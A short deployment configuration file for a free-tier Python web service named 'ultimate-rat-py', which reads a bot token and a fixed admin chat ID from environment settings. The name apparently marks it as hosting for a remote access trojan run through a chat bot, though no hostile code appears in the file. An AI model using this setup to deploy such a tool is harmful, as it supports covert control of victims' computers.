services:
  - type: web
    name: ultimate-rat-py
    runtime: python
    buildCommand: pip install -r requirements.txt
    startCommand: python main.py
    envVars:
      - key: BOT_TOKEN
        sync: false
      - key: ADMIN_CHAT_ID
        value: 6454347745
      - key: PYTHON_VERSION
        value: 3.11.0
      - key: PORT
        value: 10000
    plan: free
    autoDeploy: true
    healthCheckPath: /health
    disk:
      name: data
      mountPath: /data
      sizeGB: 1
